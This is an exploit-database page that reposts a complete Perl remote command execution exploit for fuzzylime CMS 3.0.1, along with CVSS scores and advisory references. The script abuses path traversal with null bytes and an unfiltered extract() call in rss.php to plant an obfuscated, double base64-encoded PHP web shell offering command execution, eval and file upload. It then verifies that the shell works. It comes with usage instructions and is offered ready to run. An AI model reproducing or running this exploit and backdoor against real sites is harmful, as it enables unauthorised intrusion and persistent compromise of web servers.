fuzzylime cms 3.01 Remote Command Execution Exploit

2008.07.16
Credit: Ams
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl # # fuzzylime 3.0.1 Perl exploit # # discovered & written by Ams # ax330d@gmail.com # # DESCRIPTION: # There are availability to load files through script # rss.php, and also there are unfiltered extract(); usage. # This exploit creates shell in /code/counter/middle_index_inc.php # # USAGE: # Run exploit: perl expl.pl http://www.site.com # # NEEDED: # magic_quotes_gpc=off # use strict; use IO::Socket; print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n\t\t fuzzlyime 3.0.1 exploit \n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"; if(@ARGV<1){ die "\n\tUsage:\texpl.pl url\n\n \n\tExample:\texpl.pl http://localhost/path/\n\n"; } my $expl_url=$ARGV[0]; my $shell=q~ <?php $shell='YVhOelpYUW9KRjlRVDFOVVd5ZHdhSEJwYm1adkoxMHBQMlJwWlNod2FIQnBibVp2S0NrcE9qQTdDaVJsY2owbkp6c2tjMjA5Snp4a2FYWWdZMnhoYzNNOUltNW1ieUkrU1c1bWJ6cGJjMkZtWlY5dGIyUmxQU2N1YVc1cFgyZGxkQ2duYzJGbVpWOXRiMlJsSnlrdUoxMG1ibUp6Y0R0YloyeHZZbUZzY3owbkxtbHVhVjluWlhRb0ozSmxaMmx6ZEdWeVgyZHNiMkpoYkhNbktTNG5YU1p1WW5Od08xdHRZV2RwWTE5eGRXOTBaWE5mWjNCalBTY3VhVzVwWDJkbGRDZ25iV0ZuYVdOZmNYVnZkR1Z6WDJkd1l5Y3BMaWRkSm01aWMzQTdXMlJwYzJGaWJHVmtYMloxYm1OMGFXOXVjejBuTG1sdWFWOW5aWFFvSjJScGMyRmliR1ZrWDJaMWJtTjBhVzl1Y3ljcExpZGRKbTVpYzNBN1BHSnlMejViY0dod09pY3VjR2h3ZG1WeWMybHZiaWdwTGlkZEptNWljM0E3VzNWelpYSTZKeTVuWlhSZlkzVnljbVZ1ZEY5MWMyVnlLQ2t1SjEwbWJtSnpjRHM4WW5JdlBsdDFibUZ0WlRvbkxuQm9jRjkxYm1GdFpTZ3BMaWRkSm01aWMzQTdQQzlrYVhZK1BHSnlMejRuT3dwcFppaHBjM05sZENna1gxQlBVMVJiSjNObGRDZGRLU2w3YVdZb2FYTnpaWFFvSkY5R1NVeEZVMXNuWm1rblhTa3BJR2xtS0NGQWJXOTJaVjkxY0d4dllXUmxaRjltYVd4bEtDUmZSa2xNUlZOYkoyWnBKMTFiSjNSdGNGOXVZVzFsSjEwc0pGOUdTVXhGVTFzblpta25YVnNuYm1GdFpTZGRLU2tnSkhOdExqMG5QSE53WVc0Z1kyeGhjM005SW1WeWNtOXlJajVEYjNWc1pDQnViM1FnYlc5MlpTQjFjR3h2WVdSbFpDQm1hV3hsSVR3dmMzQmhiajRuT3dwcFppaHBjM05sZENna1gxQlBVMVJiSjJWMllXd25YU2twZTI5aVgzTjBZWEowS0NrN1pYWmhiQ2drWDFCUFUxUmJKMlYyWVd3blhTazdKSE50TGoxdllsOW5aWFJmWTJ4bFlXNG9LVHQ5Q21semMyVjBLQ1JmVUU5VFZGc25aWGhsWXlkZEtUOGtjMjB1UFNjOGNISmxQaWN1WUNSZlVFOVRWRnRsZUdWalhXQXVKend2Y0hKbFBpYzZNRHQ5Q21WamFHOGdKenhvZEcxc1BqeG9aV0ZrUGp4MGFYUnNaVDR1TGk1MFpXMXdiM0poY25rZ2MyaGxiR3d1TGk0OEwzUnBkR3hsUGp4dFpYUmhJR2gwZEhBdFpYRjFhWFk5SWtOdmJuUmxiblF0Vkhsd1pTSWdZMjl1ZEdWdWREMGlkR1Y0ZEM5b2RHMXNPeUJqYUdGeWMyVjBQWGRwYm1SdmQzTXRNVEkxTVNJdlBnbzhjM1I1YkdVZ2RIbHdaVDBpZEdWNGRDOWpjM01pUGdwaWIyUjVlMlp2Ym5RdFptRnRhV3g1T25abGNtUmhibUVzWVhKcFlXd3NjMlZ5YVdZN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak16TXpPMk52Ykc5eU9pTm1PV1k1WmprN1ptOXVkQzF6YVhwbE9qRXdjSGc3ZlFvdVltOTRlMkp2Y21SbGNqb3hjSGdnYzI5c2FXUWdJMk5qWXp0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lNek16TTdiV0Z5WjJsdU9tRjFkRzg3YldGeVoybHVMWFJ2Y0RvME1IQjRPM0JoWkdScGJtYzZNVEJ3ZUR0M2FXUjBhRG8wTURCd2VEdDlDaTV1Wm05N1ltOXlaR1Z5T2pGd2VDQnpiMnhwWkNBak9UazVPMkpoWTJ0bmNtOTFibVF0WTI5c2IzSTZJelkyTmp0d1lXUmthVzVuT2pWd2VEdDlDbWx1Y0hWMGUyMWhjbWRwYmpveWNIZzdmUW84TDNOMGVXeGxQand2YUdWaFpENDhZbTlrZVQ0OFpHbDJJR05zWVhOelBTSmliM2dpUGljdUpITnRMaWNLUEdadmNtMGdaVzVqZEhsd1pUMGliWFZzZEdsd1lYSjBMMlp2Y20wdFpHRjBZU0lnWVdOMGFXOXVQU0lpSUcxbGRHaHZaRDBpY0c5emRDSStDanh3UGp4cGJuQjFkQ0IwZVhCbFBTSnpkV0p0YVhRaUlHNWhiV1U5SW5Cb2NHbHVabThpSUhaaGJIVmxQU0p3YUhCcGJtWnZJaTgrUEM5d1BncDFjR3h2WVdRNlBHbHVjSFYwSUhSNWNHVTlJbVpwYkdVaUlHNWhiV1U5SW1acElpOCtQR0p5THo0S1kyMWtPaVp1WW5Od096eHBibkIxZENCMGVYQmxQU0owWlhoMElpQnVZVzFsUFNKbGVHVmpJaUIyWVd4MVpUMGlJaTgrUEdKeUx6NEtaWFpoYkRvbWJtSnpjRHM4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlaWFpoYkNJZ2RtRnNkV1U5SWlJdlBqeGljaTgrUEhBK0NqeHBibkIxZENCMGVYQmxQU0p6ZFdKdGFYUWlJRzVoYldVOUluTmxkQ0lnZG1Gc2RXVTlJazlySWk4K1BDOXdQZ284TDJadmNtMCtQQzlrYVhZK1BDOWliMlI1UGp3dmFIUnRiRDRuT3c9PQ=='; eval(base64_decode(base64_decode($shell))); ?> ~; my $shell_name='middle_index.inc.php'; print "\tStarting exploit...\n"; if($expl_url=~m#http://#){ exploit($expl_url); } else { exploit('http://'.$expl_url); } sub exploit { # Defining... my $site=pop @_; (my $a,my $b,my $c,my @d)=split /\//,$site; my $path=join('/',@d); my $host=$c; if($path) {$path='/'.$path;} my $injection="p=../code/content.php%00&s=$shell_name%00&curcount=$shell"; my $length=length($injection); # Injecting... my $socket=IO::Socket::INET->new( Proto=>"tcp", PeerAddr=>$host, PeerPort=>"80" ); if( ! $socket){ die("\n\tUnable to connect to http://$host\n\n"); } else { my $packet = "POST $path/rss.php HTTP/1.1\r\n"; $packet .= "Host: $host\r\n"; $packet .= "Connection: Close\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length: $length\r\n\r\n"; $packet .= "$injection"; print $socket $packet; close($socket); } sleep(1); # Checking for shell... $socket=IO::Socket::INET->new( Proto=>"tcp", PeerAddr=>$host, PeerPort=>"80" ); if( ! $socket){ die("\n\tUnable to connect to http://$host (check shell yourself)\n\n"); } else { my $packet = "POST $path/code/counter/$shell_name HTTP/1.1\r\n"; $packet .= "Host: $host\r\n"; $packet .= "Connection: Close\r\n\r\n"; print $socket $packet; my $rcv; my $dat=''; while($rcv=<$socket>){ $dat.=$rcv; } if ($dat =~ /200 OK/){ print "\n\t$site\t[OK]\n\n"; } else { print "\n\t$site\t[FAIL]\n\n"; } close($socket); } }

References:

http://xforce.iss.net/xforce/xfdb/43606
http://xforce.iss.net/xforce/xfdb/43605
http://www.securityfocus.com/bid/30103
http://www.milw0rm.com/exploits/6009
http://secunia.com/advisories/30930


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top